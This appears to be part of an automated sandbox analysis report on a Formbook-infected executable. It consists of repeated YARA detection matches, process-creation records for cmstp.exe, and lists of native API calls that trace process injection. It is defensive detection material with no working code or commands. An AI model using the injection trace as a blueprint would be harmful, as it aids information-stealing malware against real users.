          Source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.0.AddInProcess32.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.AddInProcess32.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.0.AddInProcess32.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.AddInProcess32.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.0.AddInProcess32.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.0.AddInProcess32.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.920475914.0000000000DD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.920475914.0000000000DD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.745714719.0000000003CBD000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.745714719.0000000003CBD000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.746396498.0000000003DF5000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.746396498.0000000003DF5000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000000.786309842.000000000DA38000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000000.786309842.000000000DA38000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.921089072.0000000002E90000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.921089072.0000000002E90000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.745995404.0000000003D29000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.745995404.0000000003D29000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.830002490.0000000000D90000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.830002490.0000000000D90000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.733674390.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.733674390.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.734058524.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.734058524.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.829890254.0000000000D40000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.829890254.0000000000D40000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000000.768614516.000000000DA38000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000000.768614516.000000000DA38000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          .NET source code contains very large array initializationsShow sources
          Source: 583475.exe, m1DY/f0L8.csLarge array initialization: .cctor: array initializer size 4946
          Source: 583475.exe, Zp0/e6J.csLarge array initialization: .cctor: array initializer size 2762
          Source: 583475.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: 7.0.AddInProcess32.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.AddInProcess32.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.0.AddInProcess32.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.AddInProcess32.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.0.AddInProcess32.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.AddInProcess32.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.0.AddInProcess32.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.AddInProcess32.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.0.AddInProcess32.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.0.AddInProcess32.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.920475914.0000000000DD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.920475914.0000000000DD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.745714719.0000000003CBD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.745714719.0000000003CBD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.746396498.0000000003DF5000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.746396498.0000000003DF5000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000000.786309842.000000000DA38000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000000.786309842.000000000DA38000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.921089072.0000000002E90000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.921089072.0000000002E90000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.745995404.0000000003D29000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.745995404.0000000003D29000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.830002490.0000000000D90000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.830002490.0000000000D90000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.733674390.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.733674390.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.734058524.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.734058524.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.829890254.0000000000D40000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.829890254.0000000000D40000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000000.768614516.000000000DA38000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000000.768614516.000000000DA38000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\583475.exeCode function: 0_2_02AB7288
          Source: C:\Users\user\Desktop\583475.exeCode function: 0_2_02AB7720
          Source: C:\Users\user\Desktop\583475.exeCode function: 0_2_067C1668
          Source: C:\Users\user\Desktop\583475.exeCode function: 0_2_067C35D8
          Source: C:\Users\user\Desktop\583475.exeCode function: 0_2_067C82F0
          Source: C:\Users\user\Desktop\583475.exeCode function: 0_2_067C4F28
          Source: C:\Users\user\Desktop\583475.exeCode function: 0_2_067C6780
          Source: C:\Users\user\Desktop\583475.exeCode function: 0_2_067CE520
          Source: C:\Users\user\Desktop\583475.exeCode function: 0_2_067CE510
          Source: C:\Users\user\Desktop\583475.exeCode function: 0_2_067C2350
          Source: C:\Users\user\Desktop\583475.exeCode function: 0_2_067C60DB
          Source: C:\Users\user\Desktop\583475.exeCode function: 0_2_067CEAD0
          Source: C:\Users\user\Desktop\583475.exeCode function: 0_2_067CEAC0
          Source: C:\Users\user\Desktop\583475.exeCode function: 0_2_067C8BA0
          Source: C:\Users\user\Desktop\583475.exeCode function: 0_2_067C8B99
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_00401030
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0041C912
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0041BBD8
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_00408C70
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_00402D90
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0041BE0F
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_00402FB0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_00892050
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01310D20
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01334120
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0131F900
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E2D07
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E1D55
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01342581
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0132D5E0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0132841F
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D1002
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013420A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E20A8
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0132B090
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E2B28
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134EBB0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E1FF1
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013DDBD2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01336E30
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E22AE
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E2EF7
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E4B090
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04EF1002
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E4841F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E4D5E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E62581
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04F01D55
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E30D20
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E54120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E3F900
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E56E30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_04E6EBB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FAC912
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02F92FB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02F98C70
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02F92D90
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: String function: 0131B150 appears 35 times
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 04E3B150 appears 32 times
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_004185D0 NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_00418680 NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_00418700 NtClose,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_004187B0 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_004185CA NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0041867A NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_004186FA NtReadFile,NtClose,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01359910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01359540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013599A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013595D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01359860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01359840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013598F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01359710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013597A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01359780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01359FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01359A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01359A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01359660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01359A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013596E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0135AD30 NtSetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01359520 NtWaitForSingleObject,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01359560 NtWriteFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01359950 NtQueueApcThread,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013595F0 NtQueryInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013599D0 NtCreateProcessEx,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01359820 NtEnumerateKey,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0135B040 NtSuspendThread,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013598A0 NtWriteVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01359730 NtQueryVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0135A710 NtOpenProcessToken,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01359B00 NtSetValueKey,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01359770 NtSetInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0135A770 NtOpenThread,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01359760 NtOpenProcess,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0135A3B0 NtGetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01359610 NtEnumerateValueKey,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01359A10 NtQuerySection,
